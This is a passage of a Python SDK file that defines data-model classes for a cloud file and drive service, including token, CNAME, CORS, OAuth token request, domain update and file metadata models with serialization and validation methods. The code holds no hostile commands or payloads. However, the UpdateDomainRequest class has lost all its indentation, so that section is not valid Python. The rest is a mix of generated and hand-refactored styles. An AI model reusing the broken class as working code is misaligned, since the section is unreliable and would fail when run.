            (self.token, 'token'),
            (self.ttl, 'ttl'),
            (self.url, 'url'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('token', 'ttl', 'url'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('token', 'ttl', 'url'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class RPVerifyTokenResponse(TeaModel):
    """Whether real-person verification is needed, plus its token."""

    def __init__(
        self,
        need_rp_verify: bool = None,
        verify_token: VerifyTokenResponse = None,
    ):
        # False when the user is already verified or verification is disabled.
        self.need_rp_verify = need_rp_verify
        # Token details for the verification flow.
        self.verify_token = verify_token

    def validate(self):
        self.validate_required(self.need_rp_verify, 'need_rp_verify')
        self.validate_required(self.verify_token, 'verify_token')
        if self.verify_token:
            self.verify_token.validate()

    def to_map(self):
        result = dict()
        if self.need_rp_verify is not None:
            result['need_rp_verify'] = self.need_rp_verify
        token = self.verify_token
        if token is not None:
            # Serialize the nested model recursively.
            result['verify_token'] = token.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        flag = m.get('need_rp_verify')
        if flag is not None:
            self.need_rp_verify = flag
        raw_token = m.get('verify_token')
        if raw_token is not None:
            # Deserialize the nested model recursively.
            self.verify_token = VerifyTokenResponse().from_map(raw_token)
        return self
class RefreshOfficeEditTokenResponse(TeaModel):
    """Response of refreshing an Office online-edit credential."""

    def __init__(
        self,
        office_access_token: str = None,
        office_refresh_token: str = None,
    ):
        # Access token for Office online editing.
        self.office_access_token = office_access_token
        # Refresh token for Office online editing.
        self.office_refresh_token = office_refresh_token

    def validate(self):
        pass

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('office_access_token', 'office_refresh_token'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('office_access_token', 'office_refresh_token'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class RemoveStoreRequest(TeaModel):
    """Request to remove a store from a domain."""

    def __init__(
        self,
        domain_id: str = None,
        store_id: str = None,
    ):
        # Domain ID.
        self.domain_id = domain_id
        # Store ID.
        self.store_id = store_id

    def validate(self):
        for value, name in (
            (self.domain_id, 'domain_id'),
            (self.store_id, 'store_id'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('domain_id', 'store_id'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('domain_id', 'store_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class RevokeRequest(TeaModel):
    """Request to revoke a refresh token."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        refresh_token: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed.
        self.app_id = app_id
        # Refresh token returned at login.
        self.refresh_token = refresh_token

    def validate(self):
        for value, name in (
            (self.app_id, 'app_id'),
            (self.refresh_token, 'refresh_token'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('headers', 'app_id', 'refresh_token'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('headers', 'app_id', 'refresh_token'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class ScanFileMetaResponse(TeaModel):
    """Response of a scan-file-meta call: a page of files plus a cursor."""

    def __init__(
        self,
        items: List[BaseCCPFileResponse] = None,
        next_marker: str = None,
    ):
        # Files in this page.
        self.items = items
        # Pagination cursor for the next page.
        self.next_marker = next_marker

    def validate(self):
        if self.items:
            for entry in self.items:
                if entry:
                    entry.validate()

    def to_map(self):
        # 'items' is always present in the output, even when empty.
        result = {'items': []}
        if self.items is not None:
            result['items'] = [entry.to_map() if entry else None for entry in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        # 'items' is always reset, even if the key is absent.
        self.items = []
        raw_items = m.get('items')
        if raw_items is not None:
            self.items = [BaseCCPFileResponse().from_map(entry) for entry in raw_items]
        marker = m.get('next_marker')
        if marker is not None:
            self.next_marker = marker
        return self
class SearchFileResponse(TeaModel):
    """Response of a file search: a page of files, a cursor, and a total."""

    def __init__(
        self,
        items: List[BaseCCPFileResponse] = None,
        next_marker: str = None,
        total_count: int = None,
    ):
        # Matching files in this page.
        self.items = items
        # Pagination cursor for the next page.
        self.next_marker = next_marker
        # Total number of matches.
        self.total_count = total_count

    def validate(self):
        if self.items:
            for entry in self.items:
                if entry:
                    entry.validate()

    def to_map(self):
        # 'items' is always present in the output, even when empty.
        result = {'items': []}
        if self.items is not None:
            result['items'] = [entry.to_map() if entry else None for entry in self.items]
        if self.next_marker is not None:
            result['next_marker'] = self.next_marker
        if self.total_count is not None:
            result['total_count'] = self.total_count
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        # 'items' is always reset, even if the key is absent.
        self.items = []
        raw_items = m.get('items')
        if raw_items is not None:
            self.items = [BaseCCPFileResponse().from_map(entry) for entry in raw_items]
        for key in ('next_marker', 'total_count'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class SetAppPublicKeyRequest(TeaModel):
    """Request to set an App's RSA public key."""

    def __init__(
        self,
        app_id: str = None,
        public_key: str = None,
    ):
        # App ID.
        self.app_id = app_id
        # RSA public key, PEM-encoded.
        self.public_key = public_key

    def validate(self):
        for value, name in (
            (self.app_id, 'app_id'),
            (self.public_key, 'public_key'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('app_id', 'public_key'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('app_id', 'public_key'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class SetBizCNameCertRequest(TeaModel):
    """Request to set a certificate for a business CNAME."""

    def __init__(
        self,
        cert_id: str = None,
        biz_cname: str = None,
        cert_body: str = None,
        cert_name: str = None,
        cert_privatekey: str = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # Certificate ID.
        self.cert_id = cert_id
        # Business CNAME.
        self.biz_cname = biz_cname
        # Certificate body.
        self.cert_body = cert_body
        # Certificate name.
        self.cert_name = cert_name
        # Certificate private key.
        self.cert_privatekey = cert_privatekey
        # CNAME type.
        self.cname_type = cname_type
        # Domain ID.
        self.domain_id = domain_id
        # Whether the CNAME is a VPC one.
        self.is_vpc = is_vpc

    def validate(self):
        for value, name in (
            (self.cert_body, 'cert_body'),
            (self.cert_name, 'cert_name'),
            (self.cert_privatekey, 'cert_privatekey'),
            (self.cname_type, 'cname_type'),
            (self.domain_id, 'domain_id'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Note: cert_id serializes under the CamelCase key 'CertID'.
        pairs = (
            ('CertID', self.cert_id),
            ('biz_cname', self.biz_cname),
            ('cert_body', self.cert_body),
            ('cert_name', self.cert_name),
            ('cert_privatekey', self.cert_privatekey),
            ('cname_type', self.cname_type),
            ('domain_id', self.domain_id),
            ('is_vpc', self.is_vpc),
        )
        return {key: value for key, value in pairs if value is not None}

    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in (
            ('cert_id', 'CertID'),
            ('biz_cname', 'biz_cname'),
            ('cert_body', 'cert_body'),
            ('cert_name', 'cert_name'),
            ('cert_privatekey', 'cert_privatekey'),
            ('cname_type', 'cname_type'),
            ('domain_id', 'domain_id'),
            ('is_vpc', 'is_vpc'),
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class SetBizCNameRequest(TeaModel):
    """Request to set a business CNAME for a domain."""

    def __init__(
        self,
        biz_cname: str = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # Business CNAME.
        self.biz_cname = biz_cname
        # CNAME type.
        self.cname_type = cname_type
        # Domain ID.
        self.domain_id = domain_id
        # Whether the CNAME is a VPC one.
        self.is_vpc = is_vpc

    def validate(self):
        for value, name in (
            (self.biz_cname, 'biz_cname'),
            (self.cname_type, 'cname_type'),
            (self.domain_id, 'domain_id'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('biz_cname', 'cname_type', 'domain_id', 'is_vpc'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('biz_cname', 'cname_type', 'domain_id', 'is_vpc'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class SetCorsRuleListRequest(TeaModel):
    """Request to set the CORS rule list of a domain."""

    def __init__(
        self,
        cors_rule_list: List[CorsRule] = None,
        domain_id: str = None,
    ):
        # CORS rules to apply.
        self.cors_rule_list = cors_rule_list
        # Domain ID.
        self.domain_id = domain_id

    def validate(self):
        self.validate_required(self.cors_rule_list, 'cors_rule_list')
        if self.cors_rule_list:
            for rule in self.cors_rule_list:
                if rule:
                    rule.validate()
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        # 'cors_rule_list' is always present in the output, even when empty.
        result = {'cors_rule_list': []}
        if self.cors_rule_list is not None:
            result['cors_rule_list'] = [rule.to_map() if rule else None for rule in self.cors_rule_list]
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        # 'cors_rule_list' is always reset, even if the key is absent.
        self.cors_rule_list = []
        raw_rules = m.get('cors_rule_list')
        if raw_rules is not None:
            self.cors_rule_list = [CorsRule().from_map(rule) for rule in raw_rules]
        domain = m.get('domain_id')
        if domain is not None:
            self.domain_id = domain
        return self
class SetDataCNameRequest(TeaModel):
    """Request to set a data CNAME for a domain at a location."""

    def __init__(
        self,
        data_cname: str = None,
        domain_id: str = None,
        location: str = None,
    ):
        # Data CNAME, e.g. for cn-shanghai.
        self.data_cname = data_cname
        # Domain ID.
        self.domain_id = domain_id
        # Location.
        self.location = location

    def validate(self):
        for value, name in (
            (self.data_cname, 'data_cname'),
            (self.domain_id, 'domain_id'),
            (self.location, 'location'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in ('data_cname', 'domain_id', 'location'):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in ('data_cname', 'domain_id', 'location'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class StreamInfo(TeaModel):
    """Stream descriptor: checksum, URLs, size, and thumbnail."""

    def __init__(
        self,
        crc_64hash: str = None,
        download_url: str = None,
        size: int = None,
        thumbnail: str = None,
        url: str = None,
    ):
        # CRC64 hash of the stream.
        self.crc_64hash = crc_64hash
        # Download URL.
        self.download_url = download_url
        # Size in bytes.
        self.size = size
        # Thumbnail URL.
        self.thumbnail = thumbnail
        # Access URL.
        self.url = url

    def validate(self):
        pass

    def to_map(self):
        # Note: crc_64hash serializes under the wire key 'crc64_hash'.
        pairs = (
            ('crc64_hash', self.crc_64hash),
            ('download_url', self.download_url),
            ('size', self.size),
            ('thumbnail', self.thumbnail),
            ('url', self.url),
        )
        return {key: value for key, value in pairs if value is not None}

    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in (
            ('crc_64hash', 'crc64_hash'),
            ('download_url', 'download_url'),
            ('size', 'size'),
            ('thumbnail', 'thumbnail'),
            ('url', 'url'),
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class StreamUploadInfo(TeaModel):
    """Upload-session information for a stream upload.

    Carries the upload location, the per-part upload descriptors, the
    rapid-upload flags, and the upload session ID.
    """

    def __init__(
        self,
        location: str = None,
        part_info_list: List[UploadPartInfo] = None,
        pre_rapid_upload: bool = None,
        rapid_upload: bool = None,
        upload_id: str = None,
    ):
        # location
        self.location = location
        # part_info_list: per-part upload descriptors
        self.part_info_list = part_info_list
        # pre_rapid_upload (type: boolean)
        # NOTE: the generator originally emitted bare `type: boolean`
        # annotation statements here (annotating a local named `type` with
        # the undefined name `boolean`); under PEP 526 they were never
        # evaluated, but they were dead, misleading code — folded into
        # these comments.
        self.pre_rapid_upload = pre_rapid_upload
        # rapid_upload (type: boolean)
        self.rapid_upload = rapid_upload
        # upload_id
        self.upload_id = upload_id

    def validate(self):
        # Validate each nested part descriptor, if any.
        if self.part_info_list:
            for k in self.part_info_list:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize to a plain dict; 'part_info_list' is always present."""
        result = dict()
        if self.location is not None:
            result['location'] = self.location
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for k in self.part_info_list:
                result['part_info_list'].append(k.to_map() if k else None)
        if self.pre_rapid_upload is not None:
            result['pre_rapid_upload'] = self.pre_rapid_upload
        if self.rapid_upload is not None:
            result['rapid_upload'] = self.rapid_upload
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        return result

    def from_map(self, m: dict = None):
        """Populate from a plain dict; returns self for chaining."""
        m = m or dict()
        if m.get('location') is not None:
            self.location = m.get('location')
        # 'part_info_list' is always reset, even if the key is absent.
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for k in m.get('part_info_list'):
                temp_model = UploadPartInfo()
                self.part_info_list.append(temp_model.from_map(k))
        if m.get('pre_rapid_upload') is not None:
            self.pre_rapid_upload = m.get('pre_rapid_upload')
        if m.get('rapid_upload') is not None:
            self.rapid_upload = m.get('rapid_upload')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        return self
class TokenRequest(TeaModel):
    """OAuth2 token request (code / refresh / JWT / device-flow grants)."""

    def __init__(
        self,
        assertion: str = None,
        client_id: str = None,
        client_secret: str = None,
        code: str = None,
        device_code: str = None,
        grant_type: str = None,
        redirect_uri: str = None,
        refresh_token: str = None,
    ):
        # JWT grant: the signed JWT claim used to exchange for an accessToken.
        self.assertion = assertion
        # Client ID: the AppID returned when the App was created.
        self.client_id = client_id
        # Client secret: the AppSecret returned when the App was created.
        self.client_secret = client_secret
        # Code from the post-auth callback.
        self.code = code
        # OAuth2.0 device-flow parameter for exchanging a token.
        self.device_code = device_code
        # Grant type: exchange accessToken via code or via refresh_token.
        self.grant_type = grant_type
        # Callback URL registered at App creation; needed for OAuth login.
        self.redirect_uri = redirect_uri
        # refreshToken used to refresh the accessToken.
        self.refresh_token = refresh_token

    def validate(self):
        for value, name in (
            (self.client_id, 'client_id'),
            (self.client_secret, 'client_secret'),
            (self.grant_type, 'grant_type'),
        ):
            self.validate_required(value, name)

    def to_map(self):
        # Serialize under CamelCase wire names.
        pairs = (
            ('Assertion', self.assertion),
            ('ClientID', self.client_id),
            ('ClientSecret', self.client_secret),
            ('Code', self.code),
            ('DeviceCode', self.device_code),
            ('GrantType', self.grant_type),
            ('RedirectUri', self.redirect_uri),
            ('RefreshToken', self.refresh_token),
        )
        return {key: value for key, value in pairs if value is not None}

    def from_map(self, m: dict = None):
        m = m or dict()
        for attr, key in (
            ('assertion', 'Assertion'),
            ('client_id', 'ClientID'),
            ('client_secret', 'ClientSecret'),
            ('code', 'Code'),
            ('device_code', 'DeviceCode'),
            ('grant_type', 'GrantType'),
            ('redirect_uri', 'RedirectUri'),
            ('refresh_token', 'RefreshToken'),
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class UpdateAppRequest(TeaModel):
    """Request to update an App's metadata."""

    def __init__(
        self,
        app_id: str = None,
        app_name: str = None,
        description: str = None,
        logo: str = None,
        redirect_uri: str = None,
        scope: List[str] = None,
        type: str = None,
    ):
        # App ID.
        self.app_id = app_id
        # App name.
        self.app_name = app_name
        # App description.
        self.description = description
        # App logo.
        self.logo = logo
        # App callback URL.
        self.redirect_uri = redirect_uri
        # App permission scopes.
        self.scope = scope
        # App type.
        self.type = type

    def validate(self):
        self.validate_required(self.app_id, 'app_id')
        # Length limits only apply when the fields are set.
        if self.app_name is not None:
            self.validate_max_length(self.app_name, 'app_name', 128)
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)

    def to_map(self):
        # Wire keys match attribute names, so serialize via getattr.
        result = dict()
        for key in (
            'app_id', 'app_name', 'description', 'logo',
            'redirect_uri', 'scope', 'type',
        ):
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in (
            'app_id', 'app_name', 'description', 'logo',
            'redirect_uri', 'scope', 'type',
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class UpdateDomainRequest(TeaModel):
"""
update domain request
"""
def __init__(
self,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
):
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 启用钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 启用 RAM 认证
self.auth_ram_enable = auth_ram_enable
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 名称
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 开启自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 使用 Store ID
self.init_drive_store_id = init_drive_store_id
self.published_app_access_strategy = published_app_access_strategy
# 开启分享
self.sharable = sharable
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
return self
class UpdateDriveResponse(TeaModel):
    """
    Update drive response.
    """
    # Wire names match attribute names one-for-one, in serialization order.
    _KEYS = (
        'creator', 'description', 'domain_id', 'drive_id', 'drive_name',
        'drive_type', 'encrypt_data_access', 'encrypt_mode', 'owner',
        'relative_path', 'status', 'store_id', 'total_size', 'used_size',
    )

    def __init__(
        self,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        drive_name: str = None,
        drive_type: str = None,
        encrypt_data_access: bool = None,
        encrypt_mode: str = None,
        owner: str = None,
        relative_path: str = None,
        status: str = None,
        store_id: str = None,
        total_size: int = None,
        used_size: int = None,
    ):
        # Creator of the drive
        self.creator = creator
        # Free-form description of the drive
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # Drive ID
        self.drive_id = drive_id
        # Drive name
        self.drive_name = drive_name
        # Drive type
        self.drive_type = drive_type
        self.encrypt_data_access = encrypt_data_access
        self.encrypt_mode = encrypt_mode
        # Owner of the drive
        self.owner = owner
        # Path relative to the backing store; returned when the domain PathType is OSSPath
        self.relative_path = relative_path
        # Drive status
        self.status = status
        # Store ID; returned when the domain PathType is OSSPath
        self.store_id = store_id
        # Total capacity of the drive
        self.total_size = total_size
        # Used capacity of the drive
        self.used_size = used_size

    def validate(self):
        pass

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for key in self._KEYS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*, ignoring absent/None entries."""
        m = m or dict()
        for key in self._KEYS:
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class UpdateFileMetaResponse(TeaModel):
    """
    Update file metadata response.

    Fix: the generated ``__init__`` contained two bare ``type: boolean``
    statements (for ``hidden`` and ``starred``) that were clearly meant to be
    comments.  They only avoided a NameError because Python never evaluates
    local variable annotations; they are now real comments.
    """
    # (attribute, wire key, nested model class) triples in serialization
    # order.  A non-None model class marks a nested TeaModel field that is
    # (de)serialized through its own to_map()/from_map().
    # Note: attribute crc_64hash travels under the wire key 'crc64_hash'.
    _FIELDS = (
        ('category', 'category', None),
        ('characteristic_hash', 'characteristic_hash', None),
        ('content_hash', 'content_hash', None),
        ('content_hash_name', 'content_hash_name', None),
        ('content_type', 'content_type', None),
        ('crc_64hash', 'crc64_hash', None),
        ('created_at', 'created_at', None),
        ('description', 'description', None),
        ('domain_id', 'domain_id', None),
        ('download_url', 'download_url', None),
        ('drive_id', 'drive_id', None),
        ('encrypt_mode', 'encrypt_mode', None),
        ('file_extension', 'file_extension', None),
        ('file_id', 'file_id', None),
        ('hidden', 'hidden', None),
        ('image_media_metadata', 'image_media_metadata', ImageMediaResponse),
        ('labels', 'labels', None),
        ('meta', 'meta', None),
        ('name', 'name', None),
        ('parent_file_id', 'parent_file_id', None),
        ('punish_flag', 'punish_flag', None),
        ('share_id', 'share_id', None),
        ('size', 'size', None),
        ('starred', 'starred', None),
        ('status', 'status', None),
        ('streams_info', 'streams_info', None),
        ('thumbnail', 'thumbnail', None),
        ('trashed_at', 'trashed_at', None),
        ('type', 'type', None),
        ('updated_at', 'updated_at', None),
        ('upload_id', 'upload_id', None),
        ('url', 'url', None),
        ('user_meta', 'user_meta', None),
        ('video_media_metadata', 'video_media_metadata', VideoMediaResponse),
        ('video_preview_metadata', 'video_preview_metadata', VideoPreviewResponse),
    )

    def __init__(
        self,
        category: str = None,
        characteristic_hash: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_extension: str = None,
        file_id: str = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaResponse = None,
        labels: List[str] = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        punish_flag: int = None,
        share_id: str = None,
        size: int = None,
        starred: bool = None,
        status: str = None,
        streams_info: dict = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaResponse = None,
        video_preview_metadata: VideoPreviewResponse = None,
    ):
        # category
        self.category = category
        # characteristic hash
        self.characteristic_hash = characteristic_hash
        # content hash
        self.content_hash = content_hash
        # name of the content-hash algorithm
        self.content_hash_name = content_hash_name
        # content type
        self.content_type = content_type
        # CRC64 hash; serialized under the wire key 'crc64_hash'
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_extension
        self.file_extension = file_extension
        # file_id
        self.file_id = file_id
        # hidden flag
        # type: bool  (was a bare `type: boolean` statement in the generated code)
        self.hidden = hidden
        # nested image media metadata
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        self.meta = meta
        # name
        self.name = name
        # parent_file_id
        self.parent_file_id = parent_file_id
        self.punish_flag = punish_flag
        self.share_id = share_id
        # size
        self.size = size
        # starred flag
        # type: bool  (was a bare `type: boolean` statement in the generated code)
        self.starred = starred
        # status
        self.status = status
        # @Deprecated streams url info
        self.streams_info = streams_info
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type; the parameter name shadows the builtin to match the wire schema
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url
        # user_meta
        self.user_meta = user_meta
        # nested video media metadata
        self.video_media_metadata = video_media_metadata
        # nested video preview metadata
        self.video_preview_metadata = video_preview_metadata

    def validate(self):
        """Check patterns/lengths/ranges; `name` is the only required field."""
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.size is not None:
            # 53687091200 == 50 GiB upper bound from the generated schema.
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        if self.video_media_metadata:
            self.video_media_metadata.validate()
        if self.video_preview_metadata:
            self.video_preview_metadata.validate()

    def to_map(self):
        """Serialize non-None fields; nested models via their own to_map()."""
        result = dict()
        for attr, key, model_cls in self._FIELDS:
            value = getattr(self, attr)
            if value is None:
                continue
            result[key] = value if model_cls is None else value.to_map()
        return result

    def from_map(self, m: dict = None):
        """Populate fields from dict *m*; nested payloads become models."""
        m = m or dict()
        for attr, key, model_cls in self._FIELDS:
            value = m.get(key)
            if value is None:
                continue
            if model_cls is None:
                setattr(self, attr, value)
            else:
                setattr(self, attr, model_cls().from_map(m[key]))
        return self
